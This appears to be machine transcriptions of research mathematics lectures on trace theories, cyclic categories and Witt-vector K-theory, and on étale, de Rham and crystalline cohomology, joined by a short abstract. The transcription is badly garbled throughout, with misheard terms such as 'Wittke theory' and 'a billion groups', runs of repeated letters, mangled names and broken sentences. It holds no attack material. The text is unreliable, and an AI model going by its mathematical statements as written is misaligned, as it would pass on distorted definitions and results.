cycle object but let me be slightly more precise about a reminder because most people heard about it but still so just a simple thing take some n and let me denote by n brackets and long the nose there's it's a category but it's a very small category so I take a wheel we were with n vertices this is a wheel we were and this is the path category of this we were so there are objects and morphisms are just you know that of course I mean this there is orientation and the only way the only invariant for path is actually its length we just go around the quiver for as long as you want so basically alternative you can think that objects are just residues what n and then maps from a to a prime are just integers such that a plus l so l is this length is this zero and l is a map from a to a prime such that a plus l is a prime model of n of course for every guy we have an endomorphism which which is a path which goes around the loop around the wheel exactly once so there is the still a a a response to f so it's a path that goes around the loop now that I mean it's a it's a category but of course category means something huge and this one is very small but still the same kind of little objects morphin so okay now if you have two guys like this and you have some func m you observe the following you take some a object you have this don't a then you so functions and so a map to a map right so this will be some endomorphism some endomorphism of a so it has to be some power of and that guy should generates the story generates the endomorphism mono so this guy raised to some power which is a non-negative integer I do know by degree of f and in these observations that this degree does not depend on a just the same for all guys does not depend on it can be zero for example if we just send everything to a single object and all the maps to the identity then this will be zero and I wanted to be actually non-zero and for now I wanted to be exactly one so definition as a small category denoted by lambda the category so objects are just you know numbers by non-negative integers you know the traditional like this and brackets so there's some discrepancy in literature where they start numbering from zero or from one and there are valid reasons for both unfortunately so I'm going to start with one so this is just the number of vertices and then objects and then maps morphisms are just you know functions and prime of a degree one this is a very very well known gadget was invented by L.M. Kohn like almost 40 years ago and has different definitions but for me this one is now if you look at the category you can look at it's nerve as a special set you can take its classifying space and then this classifying space which I denote like this is actually so it's not it's simply connected but not contractible it's a CP infinity or equivalent to the classifying space of the circle where circle is the group considered as a group the usual group structure or you want to be you want same thing right and this means the following so if you have so if you have some function from lambda to some category which is locally constant in the sense that it inverts all maps so every map in lambda goes to something in the target category and then since the thing is simply connected locally constant means constant however they can do something slightly more refined you can now take as our target the category of spaces and whatever sense you want so it can be there are everything which models homotopy types it could be a logical spaces or completion sets matter then if you know I'll denote by whole of lambda the homotopy category functions like this so you take functions and you invert point-wise we could go answers you need some technology for that but that's standard and then if x is locally constant in the sense that this means that any map goes to something which not directly nice omorphism but the weak equivalence equivalence is a weak equivalence for all f so you have a full subcategory here spent by these guys I do know this by LC and locally constant then this local constant then is equivalent to the category of spaces with s1 action also it's logical spaces for to be precise and then so you take s1 space equipped the continuous s1 action and you take so Tina mentioned this and so this is a precise one of the ways you can make the precise statement that cyclic objects correspond to things within the circle action here is a fine point which I want to mention explicitly so this thing here can actually mean two different things and in my experience to topologists it usually means one thing and two people from all algebraic at the presentation things means the other so you consider spaces with s1 action you consider the homotopy category but the question is what kind of homotopies do we allow do you insist that homotopies are also a covariant or do you or do you just invert all maps which are how much the equivalence without regards to s1 so the latter is actually much much smaller category in the form because if you also allow a homotopies which are s1 covariant only those homotopies then for example the space of fixed points with respect to some subgroup becomes a homotopy invariant notion so this kind of refined homotopy category contains a lot of information whereas the latter thing is actually very very stupid well I mean that's it's much smaller category for example the classifying space of a point would be something contractual s1 action would be just homotopy equivalent to the point in the letter category but not in the form so this here the small one so small one so invert and then so this is one action but if your target is not just a space but something linear like a spectrum for example or you can also consider a homological version where your target is a complex of chain complex or submarine then so if x goes from one to the spectrum then you can actually split this s1 action to parts so this one has homology in degree zero and in degree one so you can split this and then you get a natural map from b from value of x let's say object one it doesn't matter which object I take here because the thing is locally constant so they all the same there is a map on this guy to its loop homologically this would be a shift in degree and this is known as con signal maybe right differential and this how the differential in the wrong with complex and also say the wrong differential in the usual the wrong complex in the context of the course the back appears with the typical source the differential some this okay so what I want to do I want to consider my with k theory and endow it with a structure of a locally constant cycle code now how do I do this again I mean there are various ways to do it but I'm going to use a category favorite so one advantage of defining this category lambda in the way I did is the following so if I take any small category Dmitry we have a question if you are taking the joint of the s1 action some disjoint base points it depends on what you mean by space but you probably want deep pointed spaces but then I want disjoint base point which is as one fixed and another question the question was about the differential on the previous slides aha should I show it yeah would be helpful yes so it was an action on a spectrum and then the smash product then is the adjoin to the free loop space isn't it yes the point is that if it's a spectrum so you have the summation map you can split the free loop space to the product of x and the base loop space so free loop space splits into x times omega x so have a map from x to Lx just this action and then I take the component which lands in the moment and that's my definition okay thanks all right so now it takes a small category and then I can define its cyclic nerve this will be a cyclic set from lambda to sets just in a very naive very direct way it sends some n you know just to the set of functions from and lambda to this completely parallel to the usual definition of a nerve or a small category except instead of kind of the category of delta which parameterizes ordinals I consider this lambda which parameterizes kind of it's now a loop category or a quiver which is a wheel and not just a string essentially the same construction obviously functorial respect with maps and lambda just from the way I can track the plan there and so it's a cyclic set I won't actually convert it to a category so there is something which is called growth and deconstruction you don't really need to know if you don't already you don't really need to know the full extent of it but what I want to do I want to consider the following category again so constant consider something we should you know I would you know lambda I some category which comes with the function and its object appears on object in lambda and some functor yeah so this projection here is forgetful which just forgets the second day forgets there's a functor and the fiber so if you have an object here then the fiber of this functor over some n it's just this discrete thing just the set of those I can do it for any functor to sets right if you do it for simple show set this is usually called the category of simplices and it's in quotes the same day tomorrow less so you can recover again your functor from sets from given a category like this a projection which satisfies some conditions now but the reason I want to do it this way is the following assume now that what you have is not a category but what they call it to catch so now take to catch I see I don't really need to know the precise definition you need to know it's something which has objects then for any two objects you have not a set of maps from C to C but set of more but category of and then there are compositions there are identity domorphisms and you can sometimes ask it to be strict so the composition is strictly associated also there are some kind of constraints there and there is actually a way to package the whole thing rather in a more convenient way using this growth and deconstruction I mean it's many places in the literature for example I just recently had an opportunity to write a preserver of this it's posted on archive pretty standard the precise details are not that important you can I mean somewhat technical but you can make it work but now what I want to do I want to consider the cyclic nerve for this two categories and sorry and I want to do it right away in a way in the second way using this growth and construction so then we have and this will now be again just a category it moves to the projection to plan so objects are pairs again and gum is a bunker from N to C so this has to be made sense of but again this is under things so objects go to objects morphisms in N go to morphisms in C but then whether it's a composable pair there is also some map which some isomorphism is between the gamma of composition and composition of the gums so these are objects and morphisms are the following so you have some let me do another board some morphisms you have some N gamma you have some N prime gamma prime and the morphisms of is a pair f is just a map prime and then why so I have this gamma which is a function from N to C I have gamma prime I can compose gamma prime with f and then this fizer map from gamma to f compose to gamma prime compose to the other way around I mean it's a similar two categories of simplex except there instead of this phi there was just a condition because there the things was just a set there were no maps but now it's a two category so now there are maps so there is an extra structure there is a extra and this such a map to know I think so morphism is called Cartesian if this phi is actually inverted doesn't have to be but if it is okay so again we have projection from one of the C to lambda which is for gets gamma for example the fiber over one would be the following so it's a category of pairs C which is an object into category and then f which is an endomorphism or the object C and then of course since C from C to C is a category now there are maps between those f's and this what makes this okay and now a general definition trace theory on C with values and some category so E is a functor along the C to E that inverts all Cartesian maps now the terminology is mine but the notions of I mean it surely was discovered sometimes in the 70 by an Australian school and then also Tina mentioned that there was a work by Kate Ponto about well several years ago five years maybe and she said about various trace structures in the apologies so she had a name I think her name was shadow if I remember correctly it's pretty close notion so the notion by itself is not that it's not unique and let's kind of axiomatizes some structures which is in nature so why do I call the trace theory so let's see what this is actually practice what what kind of data this guy consists of explicitly so first of all we have this functor we can restrict it to the favor or what so that's fun here which means that for any C and F I have some object okay but now turns out that the next next piece of data which this gadget provides so now we can consider a fiber over two this is a will quiver with two vertices so consider and the fibers is what so there is an object here an object here and then a map F F right so I have to associate something to this also but then since my e inverse Cartesian maps this can be actually identified with e related that C with coefficients in the composition but on the other hand I can equally well identify it with e at C prime and the composition taken in the other direction so what what I end up with is actually this isomorphism between the two things which is an extra piece of data and this is some kind of trace sort of quotes isomorphism trace just because it satisfies the basic true property of traces which is that trace of a B is the same of trace trace of B a right and so this is the reason for terminology and one can show that this actually I mean this has to satisfy some pretty compatibility condition and then this is the one the one correspondence so essentially I have some kind of fun for a blunder C1 plus these actor trace isomorphisms which satisfy some kind of high compatibility but the reason I bothered with the more invariant categorical definition is of course that I want to do also a homotopy version and for that it's not good to say that it's up to some hair things because you have to specify all those characters it's actually better to use this category lambda C and then the definition is that X so a homotopy trace theory is a factor from lambda C2 spaces now but I only want to consider it up to a weak equivalence of the point wise book equivalence it sits inside this homotopy category of functors and it should be locally constant along all the Cartesian maps so all Cartesian maps in lambda C go to weak equivalence that's the definition let me denote by the full subcategory spent by the homotopy trace theory now if you want you can think about this as some kind of infinity category whatever but actually for me it's not needed it's enough to consider the kind of very naive from what the category where just in words point wise book equivalence is unlimited that without any higher structures so I would not need it okay and now so an observation is that so it's not now easy to describe this thing by explicit there's no more reason because there is an infinite number of them but at least so if I have such a thing then for any C and F I get some kind of space but what's more now I can restrict my attention to the situation when this F is not just some random F but actually they didn't stand on and then this sorry okay So, if this f is the identity thing. Then what I have is actually, so there is this projection and I have a whole section of this projection which sends one to C and identity. It actually extends to all the other, 2, 3 and so on. Let me actually denote this by sigma C. And then the function sends everything to, so this is a quiver. I need to specify objects and I need to specify arrows. So all the objects would be C. All the arrows would be just the identity. Right, so there is this section. And then what I can do, I can consider now, I can pull back my tracer X with respect to this section. And this will be a locally constant, a function from lambda to space. So this will be this locally constant cyclic space. And this means that if I have a tracer, then it's value at C identity for any C. It actually comes across the circle action. So carried is a locally constant cyclic option. And in particular, if now I consider not just functions to spaces but functions to spectra, then I get this differential automatically. So tracer produces me lots of things with this circle action. And so now let me give, so this was an abstract general theory, but let me give you an example which is of interest to me. I mean, this is kind of the intended application of the formalism. For example, I take a two category of algebras and bimodors. So let me denote it by more, where this stands for more either objects, associative, unital, let's say flat algebras, and then morphisms from A to B are A, B bimodules of formulae, A opposite times B modules, M flat on one side, flat over B. You can compose this, so this is a well defined two category, so you can consider tracer. Then example number two is a much smaller. So one of the basic examples of a two category is a two category of just a single object. So when you have a single object, you only have the category of its endomorphisms, but it comes equipped with a monoidal structure because you can compose them. So a two category of a single object has the same thing as a monoidal category. And so I can consider kind of the part of this marita category, where the only algebra I consider is k itself. Let me denote this by B k mod. B here stands for classifying space if you want. So there is a single object. Can you say why flatness is necessary? You can get, no, it's actually not necessary. I mean, for the definition, it's not necessary. But there is a theorem which is coming up where this would be important. Formally, you can consider the category. I mean, this will be a larger two category, and you can do that. But there is a theorem coming up. All right, so morphisms in this B k mod R flat k mod. Now, of course, I mean, one two categories are part of another one, as I said. You just restrict one single algebra, which is k itself. So there is an obvious kind of reduction function. You take a trace theory on the large guy. And you restrict it to just the small guy. By the way, when you have the classifying two categories over a monoidal category, then the trace theory on that guy, I called, I mean, I have a paper on this where I called it a trace functor. And then, so it's a trace functor monoidal category. It's exactly this. It's a functor plus isomorphism between f of a tensor B and f of b tensor A. So this is an extra structure. It's an order is excessive, but it's in the literature, so better match. So you can restrict the trace theory to this trace functor. And then there is a very useful general statement, which says that it's actually almost an equivalent. So you can recover. This theory from the corresponding trace function. There is a left adjoint adjoint. Not just left adjoint, but the fully faithful adjoint. I called expansion functor some x. So trace theory on the big guy. And you can characterize its essential image. I don't want to give you the definition, but some version of how much the invariance invariance. So which basically holds in practice. So all three series you would want to consider in real life would be in the image. So the image. So the essential image. Can be described. So this is a bit of a miracle. And as you see, I was mostly interested in the originally in commutative algebras, but now expanded my generality non commutative algebras. Now I allowed by models. And there is a reason for that. The reason is that you get have this kind of great theorem, which roughly speaking tells you that if you generally sufficiently far, you allow algebras and by modules. Then you can get rid of algebras. So if you know the trace theory for just key, but with coefficients in arbitrary vector space, then you recover your trace theory for all algebras and all by models. And then what you're interested in is of course, some algebra plus the identity and plus the diagonal by model. But the place to generalize the story because then it reduces to just key. Okay, so this is a general thing. And of course, even if you construct a trace theory for some other methods, it's very useful to compare between two different points. So if you have some map. And you want to show the synasomorphism. It's enough to do it on the trace functional level just for key because once it's fully faithful embedding. So once an isomorphism there, it's an isomorphism everywhere. I don't have to really prove it. Machine gives it to you. Okay, and now the punchline. The punchline is of course, is that my with K theory can be promoted to hermode to be trace theory. In fact, it's almost all. So let me show. So this is down. So with K theory. So it used to be defined just for a single algebra. Now I need an algebra a. And then a by model. The model or a opposite. What I do and it's flat on one side. So what I do I consider the tensor algebra. Over a just the usual. I can't don't keep it. So I take the two sided ideal generated by m to the power of plus one and higher and I take the portion. I define completed key theory. As before simply just as a well, a more appealing respect to M. Of the strong heating guys. Then I observe as before that there is a limitation map to a which is split. So I define the definition right. So it's a statement that is completed. The algebra. Splits into K theory of a plus something else, which I want to call with K theory of a with coefficients in M. And then it also carries those endomorphies defined exactly as before because this is key theory. So the formal power series is of course the tensor algebra of the diagonal by model. But for any by model I can consider models of this algebra and then by the same. Wasting which I had last time and which I had an opportunity to recall in the beginning of this lecture. Fortunately, because of the question by Willie, it's works again in exactly the same way. And defines those endomorphisms. Again square to square to end and if now my case be local, then the whole thing you can show that this is a local you can take the kernel so you get the typical. And the lemma is that all these guys are naturally how much they're still. Let me do the big one but small one. On this two category. Algebra. And I call it a limit not a proposition. I mean it's kind of important for the business but it's also very, very simple. Show must stop this. So how do you do this. So we know what we want when it's an algebra and the by module. So we know how the way is about race theory on this fiber lambda C1. So how to define it on lambda C1. So here we have. So what's an object here. It's again a. So you have some algebras here. Zero. One. So one. And you have some by modules. Zero. Zero one. If you want one, two and so on. What you do you take just. And now I have some flexibility right. I mean I didn't say that my a is k or anything. It can be anything. So I just take a which is just the direct sum of those. I. It's an algebra. And m which is the direct sum. Of those. I plus one. It's a by module. Respect to this by model structure, which is obvious here. If you if you write in block form. It will have zeros everywhere except for the permutation cycle. So. Particular we will have nothing on the dialyinal. But we'll have something. When you off diagonal by one. And then. So what you can do you can consider. Yeah. You can consider with key theory of. And then it's very easy to prove that this actually. Anonyms are more effective with key theory of. Say a zero. With confusions in the product. So you have a cycle you can take the product. And zero one times a one. And one two. Time so on. Until then. And the reasons basically coolings there is such. So key theory is in in in variant of a category in this case the category is the category of so let me go back. The category here is the category of modules over this algebra. But this is the same as basically presentations of the cure. So what's the model here or every vertex you have some P. Which is a module over a PI which is a model over a I and then M's act. And then you can consider the subcategory of modules such that. Its value at zero is zero. And this category would have a final iteration was a certain grid cushions are just modules over a I. Which means that it's K theory would be just K theory the sum of K theories of a I where I is different from that. All the M's would disappear. Because you know when you have a matrix algebra. When you have an algebra which is written in a matrix format everything is upper triangular. It's only their terms on the diagonal that matter. It's basic property of K theory which says that it has this kind of a dTv to property when you have. An extension of two categories that K theory only depends on the categories and not on the extension date. So you can forget the extension. And then of course so there is a subcategory where the term at zero is just zero and the portion by that. Is exactly modules of free algebra over I mean a zero and then this module which is a composition. So the point is that modules over tensor algebra is a category which is very simple. It has a logical dimension one. So in this case you can analyze it completely. You can split it to parts. And you see that the difference between K groups are just K groups of the terms which we remove. And when I go to with K theory which I remind you is something where again I already took the constant term out. Then the result is that the two things are completely obvious. So I could write this down probably but to take too much space with the simple technology. So let me just say that this follows by David Sachs. And this only works because the tensor algebras are so simple. So it's logical dimension one. And for me this is the main reason which kind of to say that the whole theory wants to be non-commutative. Because if you stay in the commutative world then you can also consider free commutative variables but those would be more difficult. I mean algebra of polynomials and n variables has a logical dimension n. But if you look at non-commuting polynomials in any variables could be infinite number of them. It's still a logical dimension. I saw tricks like this one. So the upshot is that my with K theory more or less directly without any effort. Before erasing the white boards there is a question was the lambda cn plus square bracket n plus one instead of square bracket n? Yes. Because I start from zero, right? Yes. Sorry. It wasn't plus one. It's all this numbering thing. Yeah. Sorry about that. Okay so the upshot. W. And also the same is true for the particular. W. W. K. W. K. W. K. W. K. W. K. W. K. W. K. W. K. W. M for arbitrary M. W. K, right? Now there is a miracle coming up specific for the case for now. Up to now K could be anything but now let me specify, well I mean it should be local if you want to take it for position but now let me reduce the case where K is a perfect field. So if k perfect characteristic p, and there's a theorem, and this I should attribute, this is definitely due to Lars, and this is actually fantastic. So with k theory, I mean, his terminology is different, but it's a statement of k m, zero unless, so you only get anything in a single degree, and everything else is just zero. I mean, the way he proves it, it's really high tech. So he basically uses this, done as McCarthy theorem, which is a version of Goodwill theorem, which shows how k theory changes when you're doing the intasible deformations, in terms of TC, and then he does the computation with a tensor algebra, and I mean, it's a highly retrieval computation, and then everything just cancels out. If we were to know a direct proof of this, the whole theory would simplify enormously, but I don't know directly. I mean, it looks deceptively simple. Essentially, you're computing a completed k theory of tensor algebra, but tensor algebra has more homological dimension one, so you expect there to be something very simple, but I don't know any argument which would go like that, without the honest computation. And then in degree zero, it's of course highly retrieval. And so to finish today, let me just roughly speaking tell you what you get, what's the shape of things you get on degree zero. I mean, not zero, but one. I mean, there's a shift by one, that's k one. Degree one. So essentially what I get is a function from vector spaces to a billion groups. So in fact, we have a billion groups. So let me denote it just simply by W. Some kind of polynomial function of vector, so it's a function from k vector to a billion groups. It actually comes with the filtration, so it's actually complete. It's an inverse limit of a certain natural power. And the terms of the power, you cannot really describe them directly. I think the definition is the easiest way to describe them. Of course, it's just k one, so it's not that difficult. It's basically just the realization of the groups of matrices. I think actually there is a recent reference by Nikolaos and maybe Krause, I'm not sure. Well, this is worked out in writing, so it's an archived preprint from this year. I also have a paper on this which is not finished. But the point is that it's an iterated extension, so there's Wn of m, Wn plus one of m. And the kernel is the cyclic power, so it's m to the power n, co-invited with respect to sigma, where the sigma is just the order n, and the co-invited with respect to sigma, so it's a co-invited by z mod n. Of course, if it were split, this would just be zero Horses homology of the tensor algebra. And this thing is a twisted version of that, so it has a filtration such that it should associate great quotient with that. And if you want the p-typical guys, then they correspond to powers of p instead of all n's. So there is, right, correct, correct, so thank you, Yuri. This is Nikolaos Krause, but another paper by Nikolaos Krause and other people. Krause and Nikolaos. So for p-typical guys, it's the same, but you would only get powers of n would be a power of p. So there's also some natural filtration, so the rate of cyclic power, and so this is something which is very, very concrete in the order. So when I said in my first lecture that I'm not going to prove comparison between Wittke theory and Hoxley-Wittke, and the Rambit, but I will show you that Wittke theory is computable. This is basically what I meant. So by general machine of trace theory, it reduces the computation for just k. And in that case, it's a very, very concrete factor. There is nothing even hypothetical about it anymore. It's a factor from vector spaces to a billion loops, which you can analyze by hand, construct directly, and so on and so forth. Okay, I think that's enough for today. And on my last lecture on Monday, I think I will discuss a little bit the cyclotomic structure which this thing has, which we saw in Tina's lectures on Tuesday, but which in my lectures hasn't yet come up, so it will come up on Monday. Okay, thank you very much. Okay, thank you very much indeed. And let's thank the speaker for an interesting talk. Any questions at all or comments? We received a question from Remy at the end of the proof of the lemma. How has was the trace ultimately defined? Okay, so I need to define the point is that it's inconvenient to define the trace. I directly define trace theory, which is a value of, so it's a function of this lump, the lump, the lump, the C. And the trace comma comes out when you when you do this comparison is over. So basically, if you want the trace, you take a and B, you take a plus B, and then M plus N, which is the off diagonal by module. You compute with K theory of that. And you see that it has comparison with two guys with a theory of a of coefficients in the product. So let me maybe write this. Let me do the computation. I mean, not do the computation, but right, right. So if you have a, B, M and M, you do this. And there is direct comparison map, which is just, you know, it's a fun to be doing the categories. So this to this of a of coefficients in M, B. Just because the category of modules of this tensor algebra, which is in the first line contains as a full subcategory, the category of models of the tensor algebra of M times. And over a. And then you do the same at B and that raises composition of this guy and then verse to the other. So that that's roughly how it goes. Thank you. Another question. In the definition of the category lambda capital. What happens to the story if you allow maps of any degree and not just of degree one. The questions will appear on one. So, I'm going to extract you have to very good question but it's exactly what I'm going to discuss. My third lecture. Okay. Very good question. We deserve the one hour answer. Any other questions or comments. Thank you. Thanks. Thanks. Thanks. Dmitry again and next lecture will be by Tina. Thank you.
|
Motives were initially conceived as a way to unify various cohomology theories that appear in algebraic geometry, and these can be roughly divided into two groups: theories of etale type, and theories of cristalline/de Rham type. The obvious unifying feature of all the theories is that they carry some version of a Chern character map from the algebraic K-theory, and there is a bunch of “motivic” conjectures claiming that in various contexts, this map can be refined to some “regulator map” that is not far from an isomorphism. Almost all of these conjectures are still wide open. One observation whose importance was not obvious at first is that K-theory is actually defined in a much larger generality: it makes sense for an associative but not necessarily commutative ring. From the modern of of view, the same should be true for all the theories of de Rham type, with differential forms replaced by Hochschild homology classes, and all the motivic conjectures should also generalize. One prominent example of this is the cyclotomic trace map of B¨okstedt–Hsiang–Madsen that serves as a non-commutative analog of the regulator in the p-adic setting. While the non-commutative conjectures are just as open as the commutative ones, one can still hope that they might be more tractable: after all, if something holds in a bigger generality, its potential proof by necessity should use much less, so it ought to be simpler. In addition to this, non-commutative setting allows for completely new methods. One such is the observation that Hochschild Homology is a two-variable theory: one can define homology groups of an algebra with coefficients in a bimodule. These groups come equipped with certain natural trace-like isomorphisms, and this already allowed one to prove several general comparison results.
|
10.5446/50949 (DOI)
|
Right, so the title is on the blackboard. It's going to be three lectures. And I'm very grateful to the organizers for setting this up the first place and then for persevering and doing this in this format, better than nothing. I mean, there are non-real issues now, which don't appear in normal conferences. So I have to apologize. Today I have to run to finish five minutes earlier and run away to another seminar in Moscow, like from Paris to Moscow in five minutes. So today I will not be able to take questions right after the talk, but I will also give a lecture on Thursday and then on Monday next week. And so you are more than welcome to ask questions on some late. Yeah. Right, so what I want to give you is some kind of overview of really, I mean, there will not be that much proofs and maybe not that many theorems even. It's rather viewpoint on motives from something which eventually will be non-commutative, but it will come along kind of naturally. And so I have to again apologize. So it's a long story which developed over the years in kind of strange way. My own background is from algebraic geometry. This is where I come from. And this is where the story comes from originally, is some of it, but a large part of it was developed by algebraic topologists actually. And so we saw some of it in Tina's great talk yesterday and we'll see more of it today in her third lecture. And since I'm not an algebraic topologist, I mean, I might be not very, might not be very good to say references of who proved what. So I'll give you some statements which are not correct, but maybe I will miss some attributions and I apologize in advance for that. It's very good that we actually have also course by Tina on this book that Sian Matsun and so on to work, which forms a very important part of the story. So I feel kind of covered on that part. So anyway, but let me start from algebraic geometry and even not algebraic, but kind of usual geometry. So if we have some kind of X, which is a same thing to manifold. And we want to consider a skull model. And as we know, there are several ways to define it, which will give you then the same answer. I mean, there are many ways, but kind of the most standard ones are as follows. So first of all, you can think about homology and you can represent it by cycles, some actual geometric objects in X or if you want, you can do a singular homology, simple as X. This gives you homology and homology say integral coefficients or any other coefficients which you want. This is a nice theory, which also works in biological space, one approach. Another approach is instead of this, you can think more homological, you can think in terms of sheaves on X and sheave homology, but more classically, maybe you might consider check homology. So instead of considering cycles, you consider open covers, nice enough open covers, you write the check complex or that kind of stuff. Again, this gives you homology with Z and apostroery any other. And then there is a third thing, which is specific for many fields now. And this is the RAM homology. And it has no coefficients, meaning that coefficients are real, coefficients are based on represented by forms and it gives you the same result. So all, I mean, it gives you the same result when you compare it. So the RAM homology is the same as usual, say, singular homology of coefficients in part. So all give the same result. And they share some properties which are kind of natural when you want to think about something as a homology here. So this is first of all, the thing is homotopy invariant. If you have your X, you multiply it by an interval, say, you want the RAM maybe an open interval, so it is not manifold. Then you get the same thing as you had before. And then a version of it, which in the same thing to settings basically, the same statement, but let me state it separately, not the less. So if you have something which you can think of as a manifold, for example, submersion, and you consider the homology of the fibers, then they form a local system downstairs, so they're locally constant. So fiber of some point. Now this is locally constant. Again, this has several phases. You can consider relative homology, which will give you a locally constant sheave downstairs. When there are homology, you can have some vector bundles downstairs with the flat connection. The point is that if you move along your base of your family, the homology doesn't change. Okay, now let's go to algebraic setting. And the point is that in algebraic setting, kind of all three approaches survive to some extent, but they give you different things now. Let me stick to smooth for now, algebraic variety over a simple, let's say over a field key. Well, the first approach, geometric approach based on cycles, eventually have to think long and hard and invoke both our theorems, gives you what is known as a chow groups. Chow groups. Or algebraic k-field. So the two things are intimately related. Maybe k-theory is more important for me because it's somehow more fundamental, but the point is that this is a very good theory and the sense that this is really intrinsic. You don't impose anything on your variety, you just work with whatever is there already. Either cycles for chow groups or vector bundles or we can use for k-theory, but it's intrinsic. Very interesting, but hard to compute. It's notoriously hard to get handle. Okay, so this is the story. This is kind of the best replacement for a single homo in the geometric sense. Now, the story about check coverings. Well, the reasons worked in the usual topology is that you can always cover your symphony manifolds by some fine sets, which are small enough to be contractable. Algebraic is not possible anymore because if you take an algebraic variety and you take, I mean, the only topology have a priority is risk topology. And when you take kind of the smallest possible open cover, it will not be contractable at all. So if you're overseas, say you have a curve overseas and you remove points, and that's the only thing you can do, you remove points. You end up with an open curve without many points. And actually it's not contractable at all. The more points you remove, the more non-contractable it becomes. However, it is always a topological type KP1, so it's defined by a fundamental group. And then there was this great idea of growth and dig that you could generalize your notion of a cover. Instead of just open subsets, you should consider a coverings of open subsets. And if you develop that idea far enough, and if you're growth and dig, you end up with a topology. Just a second. Topology. Now this still has some limitations because in algebraic geometry, we can only consider finite covers. We don't have infinite colors. So instead of the whole fundamental group of something, we only get the profiling completion. And as a result, so you get some theory, which is nice, which behaves nicely, but the coefficients have to be, well, it can take fine coefficients, but in practical applications, people prefer L-adic homologous. So the coefficients are QL, where this is some L prime. And in characteristic zero, it's okay, but if you're in positive characteristic, then this should be different from the characteristic of your base fit. And the story I'm gonna present is mostly interesting the situation where you're in positive characteristic. So let me, so this will be some kind of P, and this will be different from. And now there's the third story, the Deraan story. And this again works. Deraan homology. So it again works nicely by theorem, and you can just do the very naive thing. You can define differential forms as exterior parts of the contention bundle. And you think about this algebraic thing. And then if you're overseas, an untrivial but true statement is that this computes the same homology. So any homology class can be represented by differential forms with polynomial coefficients. So this works. This also works in characteristic P, but of course here we have a problem, which is that the coefficients were homology theory. By definition, when you're working with Deraan homology, the same as the base, and originally lots of this was developed in the course of proving the way conjectures. And there are people wanted to have something in positive characteristics, but homology theory with coefficient characteristic zero. So there are some kinds of extension of this, which comes to the K-Map, which is called crystalline homology. So this has coefficients. K, but then there's crystalline homology, which is sort of better. So first of all, it can now be defined for a singular variety just as well. So X can be singular. The singular doesn't have to be smooth anymore. And moreover, it can have coefficients. So if we start with something over K, there is a version of homology, which is defined of coefficients in the ring of width vectors of K. So for example, if your K is just Fp, the prime field, then this will be a pediatric number, pediatric intelligence. I will speak more about this later. And not only they give you different things, it's not even clear how to compare them. So for example, if you want to compare Dirac homology and et alka homology, then you see right away that if you're in positive characteristics, you cannot do it because the coefficients are different. One is a ladic where L is not P. Whereas the other one, the Dirac-Map crystalline story, has coefficients either in Fp or maybe in Zp or Qp, with still the same P. So there is a very interesting and long story about what comparison you can do, which is called pediatric poetry. And I mean, it's due to many people from 10 faultings, and then in the end, balance on, and then in the end, I think it was finally completely resolved not very long ago by Bhabha Bukhatt, Peter Schultz, and Matthew Morrill. But even there, the statement is not obvious, because it's not hard to find, it's not that obvious, you can find the context where I mean, comparison theorem can be made. And that's for K theory. Normally, there is a map from K theory to either of the other two. But it's very far from being an isomorphism, but don't expect it to be an isomorphism. And what we expect to be able to do in the best of possible worlds is to be able to correct our commotion. There is somehow that in the end, they compute something which is closer to K. So that's the general. But let me now discuss the behavior of all these three theories in respect to those standard operations, which I mentioned in the beginning. So sort of homotopy invariance properties. So. Homotopy invariance. Here the story is again slightly different, because we don't have an interval anymore. An interval is not a algebraic thing. You can either take the whole line, which is a fine line, or you can think really in the infinitesimal. You can take, I mean, we can do it in the usual topology, but we can do it in algebraic geometry. So we can consider infinitesimal neighborhood of a very small neighborhood. And here the et alc homologies is behaves exactly as you expect. A homology theory to behave. So first of all, it's what is known. So I think the terminology is due to wave-wise care. It was not originally. I mean, it originally was not thought it was, it could be very useful. So it's kind of a great discovery. Wave-wise care that this leads to very interesting theories. So the property is called a y homotopy invariance. And this means that the homology of some x, which means what you think it means. If you multiply x by the fine line, you get the same thing. And this kind of a global state. And another important thing here is that the banner is that k theory behaves similarly in the same way. If you localize it at some L, or maybe complete some L, you can do some L with the same provisor as before. So L is not equal to characteristic. By the way, if there are any questions along the way, I don't think I can see it very well. So if some, I don't know, it could be great. Dmitry, sorry to have interrupted you. For Chris, let me go back to that slide. So, where W of k, F of dF. Yeah, the question is. So k will be the residue field. And co-efficiency is W of fraction of W. Either, I mean, there are both. There is W k, you can take the fraction. I was about to answer, but okay. And then, and for k theory, this actually hailing on trivial statement in the end, which this is, I mean, just what I wrote is actually easier, but some generalization are not. So, this is basically a discovery of Susan, which is called Susan. And then another thing which I mentioned, you can work with large bridge geometry is infinitesimal. And this is again, just true. So it's a homology of some x, which is maybe non reduced, maybe some kind of infinitesimal neighborhood of x and some ambient right is exactly the same as the homology with reduction. Doesn't feel an important. So this is the story for. Now, k theory. So as I said, if you consider k theory, they find k-efficient or completed at some L, then it's fine, but then generally, it's important to realize that k theory is not a one or more to be in a while. Well, it is if access smooth. But as I said, all the theories actually makes sense for for singular accents useful to consider them in full generality. So and for so for smooth access still true, but if you just multiply by a fine line, the k theory doesn't change. It's one of the basic theorems of William when he can develop. But in general for singular x is just not true. And it's not infinitesimal. Like this. It's not true anymore that k theory of x is the same as k theory with reduction. So if we consider some kind of infinitesimal neighborhood, then k theory would change very much. In fact, we already saw this yesterday is an intense lecture where you consider, for example, well, basic example, the mod p and the mod p square and k theory of the mod p. We know k theory of the mod p square. We don't even know. So that I mean, not completely different, but they change drastically. There's a whole story about how k theory changes when you're doing infinitesimal deformations. So, so in this sense, k theory is not is not does not behave in the way you would expect. So here it's maybe it's useful to mention that there is a complete, especially if you're in positive characteristics, there is this complete dichotomy. So you can sort of take your k theory and localize it. That's some prime different from the character. Or at the prime equal to the. And the answers are totally different. We're ready for the point. So if you just consider the point, both have been computed by by Quillen. But the answers are different. So if you computed L k efficient L not equal to P. Then I get some kind of both period is to get some polynomial algebra in one generator. Well, if you do it, the bar maybe. So it's kind of similar to topological. And if you do it at P. Then k theory of a point only, there's only K zero, there's nothing else. So already here, the behavior is different. But when you start. Say taking some kind of intasimal neighborhood of a point. So for example, lifting it to Z mod P. P to the power n, or maybe consider truncated polynomials. Then there is this relative K theory, which we saw. And that relative K theory is entirely P local. So if you look at the, if you look at the, if you look at the relative K theory is entirely P local. So if you localize that L, you get rigidity doesn't change. And if you look at P, then it changes very much. So the two kind of stories have been very different. And the kind of P local story is not at first similar to promote. And now the crystalline come over here. There is a question, does there any kind of a one invariant K theory? You can force K theory be to be a one of a rent. But for my purposes, this exactly what you don't want to do, because it completely kills off what you want to study. This is some kind of the hotline. So there's like the whole theory of motives of way was he's kind of based on the ideas that things should be a one and one. And it really leads you very far when you do a logic 